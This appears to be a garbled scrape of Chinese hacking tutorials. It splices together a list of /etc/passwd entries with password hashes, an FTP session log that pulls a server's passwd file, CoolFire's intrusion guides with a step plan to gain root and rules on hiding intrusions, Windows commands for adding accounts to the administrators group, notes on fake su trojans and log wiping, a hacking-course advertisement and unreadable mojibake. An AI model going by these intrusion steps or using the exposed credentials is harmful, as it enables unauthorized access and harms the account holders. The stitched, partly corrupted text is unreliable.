lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bas h
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash
(CoolFire 注: 因为使用PaSs2DiC 很容易找出ID 与Password 相同的. 故除了Coffee 外, 其
它我找到密码的EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)
www:/etc$ exit
logout
Connection closed by foreign host.
(可以走了!! 改用FTP 将/etc/passwd 给抓回来吧!)
https://www.doczj.com/doc/3e18594408.html,.tw> ftp https://www.doczj.com/doc/3e18594408.html,
Connected to https://www.doczj.com/doc/3e18594408.html,.
220-
220- 欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!
220-
220-
220- There are 0 users in FTP Server now.
220- 目前已有0 使用者在此Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
(还是使用刚刚的帐号进入)
Name (https://www.doczj.com/doc/3e18594408.html,:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
(直接到达档案放置地点)
ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
issue
motd
mtools
profile
securetty
shells
termcap
skel
csh.cshrc
csh.login
lilo
inet
default
services HOSTNAME
DIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample ld.so.conf
ld.so.cache
at.deny
fs
magic
rc.d
syslog.conf
printcap
inittab
sudoers
vga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN sendmail.st NETWORKING gateways
bootptab
exports
ftpusers
host.conf
hosts
hosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot networks nntpserver
protocols
resolv.conf
rpc
你好朋友 百度收索看【紫风剑客黑客入门教程】 是由黑基团队10个黑客高手呕心沥血编写的教程 包括从入门到精通全三套高清视频教程和高手进阶脚本电子书! 全套还包括我们团队全套内部vip黑客工具 工具包包括编,壳,攻,防所有类型的黑客软件! 听说紫风剑客黑客教程都是视频形式的,课程通俗易懂只要会打字就能学会不需要基础,由浅入深, 很火。并且课程的内容会随着技术的更新而更新,因为没有课程终结这个说法。并且他们有YY讲课,有不懂的地方24小时为你服务 学习黑客需要有耐心,要有全套的教程,才可以学会,首先要有视频 讲解,靠个人的参悟是很难学会的,下面了解下学习黑客的步骤: 一、前期 1、了解什么是黑客,黑客的精神是什么。当然了解一下几大着 名黑客或骇客的“发家史”也是很有必要的。 2、黑客必备的一些基础命令,包括DOS命令,以及UNIX / Linux 下的命令。 3、远程扫描、远程刺探技术。包括通过系统自带命令的信息刺 探以及使用工具扫描等。 4、密码破解。了解现在的密码破解的适用范围,以及操作技巧 等等。 5、溢出攻击。溢出工具的使用方法。 6、注入攻击。注入攻击只是一个简称,这里还要包括XSS、旁注 、远程包含等一系列脚本攻击技巧。 7、学会各种编译工具的使用方法,能编译所有ShellCode。 8、学会手动查杀任何木马、病毒,学会分析Windows操作系统, 以使自己百毒不侵。 二、中期 1、学习所有Windows下服务器的搭建步骤(ASP、PHP、JSP)。 2、掌握例如Google黑客、cookies 、网络钓鱼、社会工程学等 等等等。 3、学习HTML、JavaScript、VBScript。 4、学习标准SQL语言,以及大多数数据库的使用。 5、学习ASP,并拥有发掘ASP脚本漏洞的能力。 6、学习PHP,并拥有发掘PHP脚本漏洞的能力。 7、学习JSP,并拥有发掘JSP脚本漏洞的能力。 8、学习掌握最新脚本的特性性以及发掘漏洞的方法,例如眼下 的WEB2.0。 三、后期 1、确定自己的发展方向
前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜托你装个2000的好不好?不要再问为什么了~\\(本文注释用"\\注释内容\\"标记! 第一节课:命令的使用 你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧! https://www.doczj.com/doc/3e18594408.html, NET [ ACCOUNTS │COMPUTER │CONFIG │CONTINUE │FILE │GROUP │HELP │ HELPMSG │LOCALGROUP │NAME │PAUSE │PRINT │SEND │SESSION │ SHARE │START │STA TISTICS │STOP │TIME │USE │USER │VIEW ] 上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的. net user \\列举所有用户\\ 例子:c:\>net user net localgroup \\把用户分组\\ 例子:c:\>net localgroup administrators guest /add \\把guest 用户加到管理组.需要有足够的权限才能进行操作!\\ net share \\显示共享资源\\ 例子:c:\>net share net start \\启动服务,或显示已启动服务的列表\\ 例子:\>net start 例子:\>net start telnet \\启动telnet\\ net stop \\停止Windows2000网络服务\\ 例子c:\>net stop telnet \\停止telnet服务\\ net time \\显示时间\\ 例子:c:\>net time 127.0.0.1 \\显示127.0.0.1的时间\\ net use \\显示关于计算机连接的信息\\ 例子:c:\>net use net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\>net view net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)
7 ! ! Step2? q ?r? ē? q r ? d q r?q r?q ?? r??ēω q ?? rd ? ?? q? r?q r d Step3??q ?? r? ē ?q r ē q ? C O M r ē ? q ?r? ē ? ? d ? ? DCOM ? ?135 ? 2. ?137 138 ? Windows 137 ?? ? ? ?IIS Samba Lotus Notes ?? ?? ? I P ? 137 ? ? 137 ? ǜ ? Windows ?NetBIOS over TCP/IP?NBT?? 137 ? ? ? ??? ? ?? ? IIS ? ? ? ? ? 138 NetBIOS ? ?? ? ?? 137 ? ? ?? 138 ? NetBIOS ? ? NetBIOS ? ? ? ? ? ? ?? ? ? ? ? NetBIOS ? ? 138 137 ? ? ? ? 137 138 ? ? ?NetBIOS ? ? ?? 6-3? 137/138 ? ? ? TCP/IP ? NetBIOS ? ? ǖ Tufq2! ? ? Tufq!3! ?? ! ?
7 ! ! Tufq!4! ?!OfuCJPT 3. ?139 445 139 445 137 138 I P ? ? 139 445 SMB? ? ? DNS ? ? ? IP ? ?Windows2000 ?? Windows NetBIOS ? WINS NetBIOS ? IP ? Windows ?? CIFS DNS ? CIFS SMB ? ?SMB NetBIOS WINS ? CIFS DNS? ? Windows ? ? ?139 445 ? ?? 6-4? ?139/445 Tufq!2! ?? ? ?
CoolHC Volume 1 By CoolFire 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不 是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !! #1 甚麽是 Hacking ? 就是入侵电脑! 有甚麽好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件 等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最 好不要成为一个 "骇客", 我... 不是! #2 为甚麽要 Hack ? 我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 试试 它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操 作 !! 为了安全性而作革命! #3 Hack 守则 1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦. 恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使 用!! 注意: 千万不要破坏别人的软体或资料 !! 2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後 将它改回原状. 3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友. 4. 不要在 bbs 上谈论你 Hack 的任何事情. 5. 在 Post 文章的时候不要使用真名. 6. 正在入侵的时候, 不要随意离开你的电脑. 7. 不要侵入或破坏政府机关的主机. 8. 不在电话中谈论你 Hack 的任何事情. 9. 将你的笔记放在安全的地方. 10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞 的文件 (英文快点学好)! 11. 已侵入电脑中的帐号不得清除或修改. 12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须 维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !! 13. 不将你已破解的帐号分享与你的朋友. #4 破解之道 1. 进入主机中 2. 得到 /etc/passwd 3. 得到系统帐号 4. 得到最高权限 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1. 进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25) 或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能 同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进 行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知
coolfire黑客入门教程系列之(一) 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全 的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的 电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不 是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不 负责 !! #1 甚麽是 Hacking ? 就是入侵电脑! 有甚麽好解释的! 大部份有关介绍Hacker 的书籍或小说及文件 等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了,最 好不要成为一个 "骇客", 我... 不是! #2 为甚麽要 Hack ? 我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 试试 它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操 作 !! 为了安全性而作革命! #3 Hack 守则 1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦. 恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使 用!! 注意: 千万不要破坏别人的软体或资料 !! 2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状. 3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友. 4. 不要在 bbs 上谈论你 Hack 的任何事情. 5. 在 Post 文章的时候不要使用真名. 6. 正在入侵的时候, 不要随意离开你的电脑.
7. 不要侵入或破坏政府机关的主机. 8. 不在电话中谈论你 Hack 的任何事情. 9. 将你的笔记放在安全的地方. 10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞 的文件 (英文快点学好)! 11. 已侵入电脑中的帐号不得清除或修改. 12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须 维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !! 13. 不将你已破解的帐号分享与你的朋友. #4 破解之道 1. 进入主机中 2. 得到 /etc/passwd 3. 得到系统帐号 4. 得到最高权限 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How 1. 进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能 同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知 道, 你知道吗?! 底下的示范并不是像写出来的那麽容易, 只不过是要让你了解如何进入,当然其 中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了 面子.... 一定要删掉这些不堪入目的东西嘛... 示范进入主机的方法: (By CoolFire) (首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也
coolfire黑客入门教程系列之(六) 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写 这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件 导致恶意入侵别人的电脑或网路, 本人概不负责!! 在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人, 而不是有人故意灌水的吧? 希望新 朋友们能喜欢我们的内容, 有人问到: 有没有跟我们首页性质相近的中文站台? 很遗憾的是目前 我还没有找到.... 看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话, 欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来, 先前我们已经尽了很大的努力将档 案放在国内Server 中, 我想, 由HiNet 连这边应该很快吧? 还是水管塞住的问题?? 如果有人 的位址在.edu.tw 附近的, 欢迎来信要求Mirror~~ 我很乐意将档案Mirror 给你, 让其它网 友更方便取这些档案. 好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於Hacker 方面的问题, 也收到了许多 的回应信件, 有许多的问题在这一篇文章中都会有答案, 甚至到现在还有很多的网友们询问甚么https://www.doczj.com/doc/3e18594408.html, 是shadow password 的, 请各位多翻翻以前的文章吧!! 在CGI Holes 方面的问题也很多, 所以在 这一篇之後我会找个时间写一写System Holes #2 来让大家对一些网路上常见的程式漏洞有一些基 本的认识. 最近有许多软体更新了, 最令我们注意的当然就是NT 4.0 罗, 因为它的更新肯定会带来很多的 人更新系统, 当然这样先进的作业系统我们还是很期待有人会很快的将它的Bugs 找出来的啦!! UpYours 这套重量级的MailBomb 也出现的新的版本, 这次的V4.0 Beta 2 经试用後发现实在是 改进了很多, 但是相对的危险性也跟著提高, 其改用Delphi 来设计, 使得安装更为方便, 不过
成为一名优秀黑客的 12个基本步骤 黑客攻防是一个极具魅力的技术领域, 但成为一名黑客毫无疑问也并不容易。你必须拥有对新技术的好奇心和积极的学习态度, 具备很深的计算机系统、编程语言和操作系统知识, 并乐意不断地去学习和进步。 如果你想成为一名优秀的黑客,下面是 12种最重要的基础条件,请认真阅读: 1. 学习 UNIX/LINUX UNIX/LINUX是一种安全性更高的开源操作系统, 最早由 AT&T实验室开发, 并在安全界里广泛使用。不懂 UNIX/LINUX,不可能成为一名黑客。 2. C语言编程 UNIX/LINUX这种操作系统就是用 C 语言写的,是最强大的计算机语言,于上世纪 70年由丹尼斯?瑞切开发。想成为一名黑客,必须掌握 C 语言。 3. 学习使用多种编程语言 对于一名黑客而言,要学习使用不只一种编程语言。比如 Python 、 JAVA 、 C++等。网上有很多免费的电子书、学习指南,关键在于你的坚持和努力。 4. 学习了解网络知识 这是另一个必不可少的基础条件, 学习网络知识, 理解网络的构成。懂得不同类型网络之间的差异之处, 清晰的了解 TCP/IP和 UDP 协议。这都是在系统中寻找漏洞的必不可少的技能。理解局域网、广域网, VPN 和防火墙的重要性,精通Wireshark 和 NMAP 这样的网络扫描和数据包分析工具等,多去了解思科、联软、华为国家信息安全厂商的一些新兴技术。 5. 学习使用多种操纵系统 除了 Windows 以外,还有 UNIX/LINUX, Mac 等不同类型和版本的操作系统,而每种操作系统都有自己的漏洞,黑客需要了解这些系统,才能发现其中的漏洞。
编译语言: 1.C语言 能力要求:至少要达到精通 选用教材:《C Primer Plus 中文版(第5版)》 其他教材:《标准C程序设计(第3版)》《C语言入门经典(原书第3版)》 补充教材:《C程序设计语言》《C陷阱与缺陷》《C专家编程》《C与指针》 2.C++语言 能力要求:至少要达到熟练 选用教材:《C++ Primer 中文版(第4版)》 其他教材:《C++ Primer Plus 中文版(第5版)》 补充教材:《C++程序设计陷阱》《Effective C++》《More Effective C++》《Essential C++中文版》 3.ASM语言 能力要求:至少要达到掌握 选用教材:《80x86汇编语言程序设计教程》和《Windows环境下32汇编语言程序设计》 其他教材:《汇编语言》 补充教材:《汇编语言编程艺术》 脚本语言: 1.ASP 能力要求:至少要达到掌握 选用教材:尚无 其他教材:尚无 补充教材:尚无 2.PHP 能力要求:至少要达到精通 选用教材:《PHP与MySQL基础教程(第2版)》 其他教材:《PHP和MySQL Web开发(原书第3版)》《PHP和MySQL Web应用开发核心技术》补充教材:《Ajax与PHP基础教程》 3.Perl 能力要求:至少要达到熟练 选用教材:《Perl语言入门(第4版)》 其他教材:《Perl技术内幕》《Perl教程(Win32版)》 补充教材:《Perl网络编程》 4.Python 能力要求:至少要达到掌握 选用教材:《用Python学编程》 补充教材:《Python网络编程基础》 操作系统(这里看导师的项目要求,原则上推荐从Microsoft开始。): 概览类:《深入理解计算机系统》 1.Windows 系统学习类:《深入解析Windows操作系统》 系统编程类:《Windows程序设计》和《Windows核心编程》
最简单的黑客入门教程大全 目录 1 黑客简介 (3) 2 保护自己电脑绝对不做黑客肉鸡 (4) 3 抓肉鸡的几种方法 (8) 4 防止黑客通过Explorer侵入系统 (17) 5 SQL注入详解 (19) 5.1 注入工具 (20) 5.2 php+Mysql注入的误区 (21) 5.3 简单的例子 (23) 5.4 语句构造 (26) 5.5 高级应用 (42) 5.6 实例 (50) 5.7 注入的防范 (55) 5.8 我看暴库漏洞原理及规律1 (56) 5.9 我看暴库漏洞原理及规律2 (61) 6 跨站脚本攻击 (65) 6.1 跨站脚本工具 (65) 6.2 什么是XSS攻击 (66)
6.3 如何寻找XSS漏洞 (66) 6.4 寻找跨站漏洞 (67) 6.5 如何利用 (67) 6.6 XSS与其它技术的结合 (71) 7 XPath注入 (71) 7.1 XPath注入介绍 (71) 7.2 XPath注入工具 (76) 声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介 "黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。如果你只是简单的将"黑客"和"恶意的安全骇客"划等号,将无法在与人交流安全技术问题时,轻松的分辨别人所指的到底是哪种类型的人。黑客和骇客的区别是,黑客仅仅对技术感兴趣,而后者则是通过技术获取职业发展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并以此为乐。对于某些人来说,这个词并不准确,而对于另一些人来说,黑客意味着最终能完全掌握某些事情。根据RFC1392的记载,互联网用户词汇将"黑客"定义为:迷恋于获取某些系统尤其是计算机和计算机网络系统内部运作机制的人。而这个词经常被错误的用于贬义环境。在贬义环境中,正确的用词应该是"骇客"。TheJargonWiki对于"黑客"的首次定义为:迷恋于探知可编程系统细节以及如何扩展其功能的人,与大多数只需了解系统基本知识的人
写一个简单的入门教程,整个游戏界面为英文,翻译了一些,,只是引领你入门,接下来的后续任务还是交由你自己来完成。。 游戏长这样: 进入游戏后主界面:
主菜单介绍: 开始 系统状态 设置 信息 ----------------- 进入系统状态选项: [此界面是记录自己的英雄事迹]
这是我目前的成就: 1.你已经接受了这份工作 2.已经完成开机的任务 3.成功运行命令 4.已经成功入侵某组织并且访问了他们的数据,你的雇主给了你一款黑客软件,使用“run‘命令即可运行 5.成功运行此黑客工具 ...... [返回] --------------------------- 全局设置: 技巧及攻略 通过Email分享给好友 通过Facebook分享 联系我们 震动开关
字体颜色 重置档案 [返回] 全局设置里面需要了解的是技巧与攻略这一项----------------------- 进入攻略提示界面: *此部分内容包含游戏技巧指引。 *不知道如何开始游戏? -查看入门指南. *无法通关? -查看提示与答案部分.
此部分可能需要联网查询 -------------------------------------- Hack RUN 玩法技巧 时常输入“help”命令能查看所登陆系统中当前提供的命令行。 你能通过手势点击窗口右上角的“X”符号来退出终端。 旋转你的手机能以纵向或者横向的方式观看终端。 “System Status”按钮将会显示你所完成的成就。 你能使用一些缩短版本的命令,如“h”代表help。 你能使用“web”明天添加一个url地址,如“web i273”或“w i273”。 “Already logged in ? ”如果你跳过一个关卡,你将会看到这样一条消息。试图放弃某一步骤你将无法看到下一关。 *确保你的设备(iPhone,iPad,ipod Touch)已经升级到最新的操作系统版本(3.2版本或更高),你还需要确保已正确设置你的设备上的时间。 *无法通关?千万不要因为这个给应用程序评一个糟糕的分数,请查看提示与攻略部分。 点击[back]返回全局设置界面
当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。 无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。 2.权限的扩大 系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。 只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su变成root了。 攻击的善后工作 1.日志系统简介 如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统的不同略有变化 /usr/adm——早期版本的Unix。 /Var/adm新一点的版本使用这个位置。 /Varflort一些版本的Solaris、Linux BSD、Free BSD使用这个位置。 /etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。 下面的文件可能会根据你所在的目录不同而不同:
最简单的黑客入门教程 目录 1 黑客简介 (3) 2 保护自己电脑绝对不做黑客肉鸡 (5) 3 抓肉鸡的几种方法 (10) 4 防止黑客通过Explorer侵入系统 (19) 5 SQL注入详解 (22) 5.1 注入工具 (23) 5.2 php+Mysql注入的误区 (24) 5.3 简单的例子 (27) 5.4 语句构造 (30) 5.5 高级应用 (48) 5.6 实例 (57) 5.7 注入的防范 (62) 5.8 我看暴库漏洞原理及规律1 (64) 5.9 我看暴库漏洞原理及规律2 (70) 6 跨站脚本攻击 (75) 6.1 跨站脚本工具 (75) 6.2 什么是XSS攻击 (76) 6.3 如何寻找XSS漏洞 (77) 6.4 寻找跨站漏洞 (78) 6.5 如何利用 (78)
6.6 XSS与其它技术的结合 (81) 7 XPath注入 (82) 7.1 XPath注入介绍 (82) 7.2 XPath注入工具 (87) 声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介 "黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。如果你只是简单的将"黑客"和"恶意的安全骇客"划等号,将无法在与人交流安全技术问题时,轻松的分辨别人所指的到底是哪种类型的人。黑客和骇客的区别是,黑客仅仅对技术感兴趣,而后者则是通过技术获取职业发展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并
CoolFire系列讲座第1讲 作者:CoolFire [coolfires@https://www.doczj.com/doc/3e18594408.html,] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@https://www.doczj.com/doc/3e18594408.html, 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全 的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的 电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不 是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不 负责!! #1 甚么是Hacking ? 就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最 好不要成为一个"骇客", 我... 不是! #2 为甚么要Hack ? 我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试 它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命! #3 Hack 守则 1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦. 恶意破坏它人的软体将导致法律刑责, 